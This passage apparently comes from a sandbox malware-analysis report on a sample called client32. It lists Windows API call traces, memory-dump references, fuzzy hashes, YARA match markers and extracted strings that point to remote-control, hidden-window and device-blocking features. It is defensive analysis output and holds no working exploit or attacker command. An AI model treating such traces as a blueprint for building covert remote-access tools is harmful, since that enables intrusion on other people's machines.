• GetSystemMetrics.USER32(00000032), ref: 1102722A
• GetSystemMetrics.USER32(00000031), ref: 1102722F
• LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
• String ID: AdminUserAcknowledge$PCIRES$_License$product
• API String ID: 1946015-1270847556
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___crtGetStringTypeA.LIBCMT ref: 687E69B7
                                                                                                                                                                                                    • memcmp.MSVCR100(?,000000FE), ref: 687E6A74
                                                                                                                                                                                                    • _getptd.MSVCR100(00000001,00000000), ref: 687E6AC9
                                                                                                                                                                                                      • Part of subcall function 687E50C1: _getptd.MSVCR100(00000000,00000000,00000005), ref: 687E50F7
                                                                                                                                                                                                      • Part of subcall function 687E50C1: strcpy_s.MSVCR100(00000000,00000000,687E51A0,00000000,00000000,00000005), ref: 687E5165
                                                                                                                                                                                                    • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 687E6B10
                                                                                                                                                                                                    • _strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 687E6B26
                                                                                                                                                                                                    • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 687E6B35
                                                                                                                                                                                                      • Part of subcall function 687E0B31: malloc.MSVCR100(00000001,00000001,00000001,?,687EA974,00000018,687EA948,0000000C,688074F7,00000001,00000001,?,687E1EE5,0000000D), ref: 687E0B3D
                                                                                                                                                                                                    • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 687E6B83
                                                                                                                                                                                                    • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 687E6BAC
                                                                                                                                                                                                    • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 687E6BE6
                                                                                                                                                                                                    • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 687E6C12
                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(00000000), ref: 687E6C3B
                                                                                                                                                                                                    • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 68810C5C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2195150593-0
                                                                                                                                                                                                    • Opcode ID: c698a9c5b700b96da38e228ff9f6470614a8828958c5a1015ca90e7007f95b60
                                                                                                                                                                                                    • Instruction ID: 2ad41e502cc803fe1bc03e27a2efe6d7389ae33fe6535582395a98f89b34572e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c698a9c5b700b96da38e228ff9f6470614a8828958c5a1015ca90e7007f95b60
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FA10875A002199FDB25CF28CD98BE9B7B5FF49304F5044A9E61DE7250EB30AA91CF60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,11136285,00000000,?,?), ref: 1112D638
                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,?,11136285,00000000,?,?), ref: 1112D667
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                                                                    • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                                                                                                    • API String ID: 3252650109-4091810678
                                                                                                                                                                                                    • Opcode ID: cd1c5dd9d1a3bb181a6b56db3fe8ce8364c259ea6c9d772f7103b6a17e3b32b4
                                                                                                                                                                                                    • Instruction ID: fa0dcf7bfd4a991f80e84da17f5d1f9dbb64edff6fc809840f3415ca9232f2cb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd1c5dd9d1a3bb181a6b56db3fe8ce8364c259ea6c9d772f7103b6a17e3b32b4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A761E371B40315AFEB11CBD4CC85F6AF7A5E744B18F604129F625AB2C4EAB16840CB85
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsnlen.MSVCR100(?,?,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 687ECC20
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C847
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C851
                                                                                                                                                                                                    • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C86E
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C87F
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C88A
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C8A0
                                                                                                                                                                                                    • malloc.MSVCR100(00000008,?,?,687ECC8D,?,?,?), ref: 6880C8D8
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,687ECC8D,?,?,?), ref: 6880C8F4
                                                                                                                                                                                                    • ___crtLCMapStringW.LIBCMT(?,00000200,?,000000FF,00000000,00000000,?,?,687ECC8D,?,?,?), ref: 6880C90F
                                                                                                                                                                                                    • wcscpy_s.MSVCR100(?,?,00000000,?,?,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C920
                                                                                                                                                                                                    • _freea_s.MSVCR100(00000000,?,?,?,?,?,?,?,?,687ECC8D,?,?,?), ref: 6880C939
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$String___crt$_freea_s_invalid_parameter_noinfomallocwcscpy_swcsnlen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4082481270-0
                                                                                                                                                                                                    • Opcode ID: a73b84564032e81ca5f76feaaa2f9143374db121b2572676fe87ebd0858b8611
                                                                                                                                                                                                    • Instruction ID: 6d59b7e9caa34b71d4b2b71a225e8905188bd402a622bf8149d2af7f9bf5632f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a73b84564032e81ca5f76feaaa2f9143374db121b2572676fe87ebd0858b8611
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29413675A14104EFE7145FACCC8C93E37E6EF46314B90492AF524DB292EB348D4097B9
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                                                                    • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                                                                                                                                    • API String ID: 2111968516-2092292787
                                                                                                                                                                                                    • Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
                                                                                                                                                                                                    • _memset.LIBCMT ref: 110FD3E2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressLibraryProc$FreeLoad_memset
                                                                                                                                                                                                    • String ID: 0$GetGUIThreadInfo$SendInput$user32
                                                                                                                                                                                                    • API String ID: 530983809-271338563
                                                                                                                                                                                                    • Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
                                                                                                                                                                                                    • Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • GetLastError.KERNEL32(Client,00000000,00000001,00000000), ref: 110FD146
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD17C
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 110FD18A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread$ErrorLast__wcstoi64
                                                                                                                                                                                                    • String ID: *Log_%d$@r$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
                                                                                                                                                                                                    • API String ID: 2021241812-3004467057
                                                                                                                                                                                                    • Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegisterClassA.USER32(111E9674), ref: 1105D1F2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMCobrProxy,11190240,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1105D233
                                                                                                                                                                                                    • SetPropA.USER32(?,NSMCobrProxy,00000000), ref: 1105D2BD
                                                                                                                                                                                                    • GetMessageA.USER32(00000000,?,00000000,00000000), ref: 1105D2E0
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1105D2F6
                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 1105D2FC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
Similarity
• API ID: Message$ClassCreateDispatchErrorExitLastProcessPropRegisterTranslateWindowwsprintf
• String ID: CobrowseProxy.cpp$CobrowseProxy::RunCobrowse$NSMCobrProxy$_bOK$m_hAppWin
• API String ID: 13347155-1383313024
• Opcode ID: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
• Instruction ID: 0f733430d951bad01d0579ae861b00247f75b5e4436af6dec06e8f89504007ad
• Opcode Fuzzy Hash: 37c3c3e8957f14a7e3b355c897228082546cf523f8d38056e85fd5e1210056e5
• Instruction Fuzzy Hash: 3341F1B5E0074AABD761DFA5CC84F9FFBA5AB44758F10842AF91697280EA30E440CB61
APIs
• GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 11140450: GetTickCount.KERNEL32 ref: 111404B8
• wsprintfA.USER32 ref: 11029157
• MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
• ExitProcess.KERNEL32 ref: 110291A9
• _strrchr.LIBCMT ref: 110291E5
• ExitProcess.KERNEL32 ref: 11029224
Strings
• Assert. File %hs, line %d, err %d, Expr %s, xrefs: 11029126
• Info. assert, restarting..., xrefs: 1102920D
• Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s, xrefs: 11029151
• Client32, xrefs: 11029185
• V12.10F4, xrefs: 11029143
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ExitProcess$CountErrorLastMessageTick_strrchrwsprintf
• String ID: Assert failed, file %hs, line %d, error code %dBuild: %hsExpression: %s$Assert. File %hs, line %d, err %d, Expr %s$Client32$Info. assert, restarting...$V12.10F4
• API String ID: 2763122592-3703414834
• Opcode ID: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
• Instruction ID: 0c35b4c0934c547b9efc755c54c54cf2bc7aea1eab2dc2738ce497f42af58575
• Opcode Fuzzy Hash: 46b0b576eeee1707cfa4597fddd227d26b12d5d0a7ecbe0e050bda6c28fca704
• Instruction Fuzzy Hash: 8D310B75A0122AAFE711DFE5CCC5FBAB7A9EB4470CF104028F72587281E670A940CB61
APIs
  • Part of subcall function 110EBBE0: LocalAlloc.KERNEL32(00000040,00000014,?,1100D58F,?), ref: 110EBBF0
  • Part of subcall function 110EBBE0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D58F,?), ref: 110EBC02
  • Part of subcall function 110EBBE0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D58F,?), ref: 110EBC14
• CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D5A7
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D5C0
• _strrchr.LIBCMT ref: 1100D5CF
• GetCurrentProcessId.KERNEL32 ref: 1100D5DF
• wsprintfA.USER32 ref: 1100D600
• _memset.LIBCMT ref: 1100D611
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D649
• CloseHandle.KERNEL32(?,00000000), ref: 1100D661
• CloseHandle.KERNEL32(?), ref: 1100D66A
Strings
Yara matches
Similarity
• API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
• String ID: %sNSSilence.exe %u %u$D
• API String ID: 1760462761-4146734959
• Opcode ID: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
• Instruction ID: a456dda971beae3ede1202bfd149c5043837a25f7bf8d7d11396327520b54e87
• Opcode Fuzzy Hash: 8e94b261c6efca61078e1c150cf0d839bc558289722da67addac1a9607ec9e4e
• Instruction Fuzzy Hash: EE218675E41329ABEB60DBE4CC89FDEB77C9B04708F108195F719A71C0DAB0AA448F65
APIs
• GetDC.USER32(00000000), ref: 110A75D6
• CreateCompatibleDC.GDI32(00000000), ref: 110A75E2
• GetRgnBox.GDI32(?,?), ref: 110A7603
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 110A7622
• SelectObject.GDI32(00000000,00000000), ref: 110A7638
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00FF0062), ref: 110A7667
• OffsetRgn.GDI32(00000000,?,?), ref: 110A7682
• SelectClipRgn.GDI32(00000000,00000000), ref: 110A7693
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110A76B3
• SelectObject.GDI32(00000000,?), ref: 110A76BE
• DeleteDC.GDI32(00000000), ref: 110A76C5
• ReleaseDC.USER32(00000000,00000000), ref: 110A76D1
Yara matches
Similarity
• API ID: Select$CompatibleCreateObject$BitmapClipDeleteOffsetRelease
• String ID:
• API String ID: 1998184411-0
• Opcode ID: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
• Instruction ID: d01220f1ca20b58af6d54b71fb89cfd4fca4eb7da2e1d7c7476d03a363cea98d
• Opcode Fuzzy Hash: ca1efe98171b5a85fa15818eb71c06998636f57872ca048fd57581ab3a04e152
• Instruction Fuzzy Hash: C841EA75A00616AFD715CFA8C889EBFBBB9FB8C705F108559FA15A3244CB35AC01CB61
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: __forcdecpt_l_isleadbyte_l_mbtowc_l_strlen
• String ID: $g
• API String ID: 3157115575-3845294767
• Opcode ID: 36707a3e2a5628296dca1a9f31a68177c4e25ce453fd791f432a5fe6222f307d
• Instruction ID: 975ad1769f69acbb9794a6a50c56faa06a415f72ef5ea08f57d33a26fac68372
• Opcode Fuzzy Hash: 36707a3e2a5628296dca1a9f31a68177c4e25ce453fd791f432a5fe6222f307d
• Instruction Fuzzy Hash: A6227DF1D0462DCADB208F18CE8C799B7B4AB05318F9041E9F768A7261D7749AC5CF68
APIs
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• std::exception::exception.LIBCMT ref: 1113B29B
• __CxxThrowException@8.LIBCMT ref: 1113B2B0
• SetPropA.USER32(?,?,00000000), ref: 1113B33E
• GetPropA.USER32(?), ref: 1113B34D
• wsprintfA.USER32 ref: 1113B37F
• RemovePropA.USER32(?), ref: 1113B3B1
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Prop$wsprintf$Exception@8RemoveThrow_memsetstd::exception::exception
• String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
• API String ID: 1006086998-1590351400
• Opcode ID: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
• Instruction ID: 61aa09a3932057afedc91f8550a7d54e25a2d8e58743395c812a8a85ab32a301
• Opcode Fuzzy Hash: e80bc59964b50164fd05165775aa6cd928dd734280def06f5c21c77cfc7c1a8b
• Instruction Fuzzy Hash: AA71E975E112299FD710CFA9DD80BAEF7B8FB88325F40456FE90AD7244D634A900CBA5
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,24DE4E77), ref: 11059069
• EnterCriticalSection.KERNEL32(?), ref: 110590CE
• timeGetTime.WINMM ref: 110590FC
• GetTickCount.KERNEL32 ref: 11059136
• LeaveCriticalSection.KERNEL32(?), ref: 110591AA
• EnterCriticalSection.KERNEL32(?), ref: 110591C4
• LeaveCriticalSection.KERNEL32(?), ref: 110591E9
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
• String ID: @r$_License$maxslaves
• API String ID: 3724810986-2836753679
• Opcode ID: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
• Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
• Opcode Fuzzy Hash: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
• Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1
APIs
Strings
• SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
• IsA(), xrefs: 1103D284
• SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
• BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
• RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
• SETOPTICALDRIVEACCESS, xrefs: 1103D214
